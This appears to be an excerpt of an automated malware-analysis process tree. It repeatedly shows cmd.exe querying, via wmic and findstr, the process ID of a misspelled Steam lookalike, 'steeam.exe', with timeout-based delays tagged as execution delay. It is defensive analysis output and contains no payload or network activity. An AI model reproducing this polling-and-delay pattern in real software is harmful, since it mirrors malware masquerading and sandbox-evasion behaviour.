C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
